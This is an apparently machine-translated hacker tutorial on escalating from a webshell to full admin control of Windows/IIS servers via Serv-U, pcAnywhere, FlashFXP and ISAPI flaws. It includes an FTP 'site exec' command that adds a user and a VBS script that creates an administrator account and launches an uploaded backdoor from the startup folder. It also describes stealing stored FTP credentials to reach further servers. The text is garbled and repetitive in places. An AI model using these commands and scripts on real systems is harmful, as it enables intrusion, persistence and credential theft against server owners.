Monopoly Privilege Escalation Overview

Webshell Privilege Escalation has always been one of the most popular scripting problems. Of course, it is also the most difficult issue. Therefore, according to my methods of privilege escalation and the files collected by the network

Chapter introduces this webshell Privilege Escalation tutorial. I hope you can learn something and actively add and make progress together!
**************************************** *****************************

Usually anonymous permission (ASP)

ASP. NET to USER Permissions

Net.exe net1.exe netstat.exe ftp.exe

Self-uploaded files

The list of elevation methods included in this tutorial:

Lesson 1: Overview of Elevation of Privilege (including the concept of Elevation of Privilege, General permissions, and common third-party software)

Lesson 2: Raise the right of pcanywhere (solve the problem that passwords cannot be read in later versions)

Lesson 3: privilege escalation on the serv-u server (if the serv-u directory has the permission to modify)

Lesson 4: privilege escalation on the serv-u server (the serv-u directory does not have the permission to be modified)

Lesson 5: Permission escalation of G6FTP server (another new FTP server after serv-u)

Lesson 6: Using HASH to crack Elevation of Privilege (the best penetration method for Server clusters)

Lesson 7: CAIN sniffing 3389 password (a good way to use the target host without vulnerabilities)

Lesson 8: SA password elevation (carefully search for the CONN files)

Lesson 9: Authorization for VNC password cracking (read VNC password from Registry)

Lesson 10: replacing service Elevation of Privilege (the oldest Elevation of Privilege)

Lesson 11th: MYSQL root Password elevation (latest and most effective Elevation of Privilege)

Lesson 12th: privilege escalation in the Tomcat environment (using JSP to run with system permissions)

Lesson 12th: Privilege Escalation of FlashFXP replacement document (using social engineering)

Lesson 13th: modifying asp. dll operation permission elevation

Lesson 14th: Elevation of Privilege using radmin

Lesson 15th: Using VBS scripts to escalate Permissions

Lesson 16th: Port ing solves Intranet Elevation of Privilege

Lesson 17th: Using jet overflow to raise Permissions

Lesson 18th: Use the NC bounce function to raise Permissions

Lesson 19th: Elevation of Privilege using winRAR

Lesson 20th: MS06040 privilege escalation through the Intranet/MS06035

Constantly add ...........

**************************************** * Common Methods ************************************ ********
Speaking of getting a webshell,
Of course, I still want to continue to obtain the admin permission of the entire server, just as it is not a good hacker who doesn't want to get the admin permission ~
Xi ~~ Come with me and see what can be used to escalate Permissions
**************************************** ************************************
First
If the pcanywhere Server is installed on the server, the administrator needs to facilitate management.
It also gives Us convenience, to the system disk's Documents and Settings/All Us
Ers/Application Data/Symantec/pcAnywhere/download *. cif local
The pcanywhere connection will be okay if the attack is cracked.
**************************************** ************************************
Second
A lot of Tom asked me to upgrade the iis user permission of webshell.
Generally, the management of servers is completed on the local machine and uploaded to the space,
Ftp is used, and servu is the most used server.
Then we can use servu to raise the permission.
To enhance permissions through servu, you need to write the servu installation directory ~
First, access ServUDaemon. ini in The servu installation folder through webshell and download it.
And then install a servu on the local machine to overwrite ServUDaemon. ini in the local installation folder,
Start servu and add a user, set as system administrator, directory C:, with executable permission
Go To The servu installation directory and change ServUDaemon. ini to the server.

Connect with my new user and password ~
Okay, it's still connected.
Ftp
Ftp> open ip
Connected to ip.
220 Serv-u ftp Server v5.0.0.4 for WinSock ready...
User (ip :( none): id // The User you just added
331 User name okay, please send complete E-mail address as password.
Password: password // Password
230 User logged in, proceed.
Ftp> cd winnt // enter the winnt directory of win2k
250 Directory changed to/WINNT
Ftp> cd system32 // enter the system32 directory
250 Directory changed to/WINNT/system32
Ftp> quote site exec net.exe user rover rover1234/add // use the system's net.exe
File and user.

If you are prompted that you do not have the permission
Upload the background (server.exe) to the system32 directory.
Then write a VBs tutorial.
Set wshshell = createobject ("wscript. shell ")
A = wshshell. run ("cmd.exe/c net user pass/add", 0)
B = wshshell. run ("cmd.exe/c net localgroup Administrators user/add", 0)
B = wshshell. run ("cmd.exe/c server.exe", 0)

Saved as xx. vbe
The role of this tutorial is to set the user password to pass
And promoted to administrator
Then execute server.exe in the system32directory.
Pass this tutorial C: Documents and SettingsAll Users Start Menu \ Program
Directory
In this way, the Administrator will execute the tutorial as soon as he logs in.
The next step is to wait. Wait for him to log on.

Third
Check the system services, programs automatically started with the system, and frequently used software by administrators, such as Norton, VAdministrator, Kingsoft, rising star, WinRAR, and even QQ, can it be written? If you can, modify the program, bind a batch or VBS, and wait for the server to restart.
**************************************** ************************************
Fourth
Find the conn and config files and pass the files to see if you can get the sa or mysql password.
Gains and so on.
**************************************** ************************************
Fifth
Using Flashfxp can also improve permissions, but the success rate depends on your luck.
First, find the FlashFXP folder and open (edit) Sites. dat. This file contains the password and user name,
The password is encrypted. If I copy these files back to my local computer, replace the local files. Then, you will find that the site manager is the same as opening flashfxp on the site. You can add N more bots ~~ Xi ~

Huh ?? No, it's about improving the permissions. Don't give up halfway.
Let's take a look at the website manager of the other administrator. the user name and password are asterisks. You can use the xp asterisks password viewer to view the information, and then use Sites. in dat, the passwords are encrypted, and the passwords are displayed in plain text. Then, the website administrator's password is retrieved from the heap.
. Next, you can link these new servers ~~
After testing, you only need to replace the Sites. dat file containing the password and user name with the corresponding local file.
Restore the passwords of each site of the Administrator.
**************************************** ************************************
Sixth

WIN2K + IIS5.0 by default, the application protection option is "medium (shared)". At this time, IIS is used to load isapi
The iwam_computername user identity is executed.
However, by default, WIN2K + IIS5 must be loaded as a system for some special isapis. Win2k + iis5,
Win2k + iis5 + sp1, win2k + iis5 + sp2 are simple judgment of isapi file names without directory restrictions,
The isapis loaded with the SYSTEM permission include:
1. idq. dll
2. httpext. dll
3. httpodbc. dll
4. ssinc. dll
5. msw3prt. dll
6. author. dll
7. admin. dll
8. shtml. dll
9. sspifilt. dll
10. compfilt. dll
11. pwsdata. dll
12. md5filt. dll
13. fpexedll. dll

Therefore, it is easy to obtain the SYSTEM permission. There is a bug when determining the file name, such as request/scripts/test % 81% 5cssinc. dll will also be considered as the requested ssinc. dll, that is, the dual-byte Far East version is not taken into account when the file path is separated. Ssinc. dll also has a problem when processing the path containing files, that is, "/" and "" only recognize one "/". Therefore, if "", this vulnerability may cause file paths to be incorrectly handled, and may cause leakage or permission vulnerabilities. Many other vulnerabilities (such as php and asp) also exist.

Loading these isapis is not based solely on the file name, but on the path, which should be corrected.
General default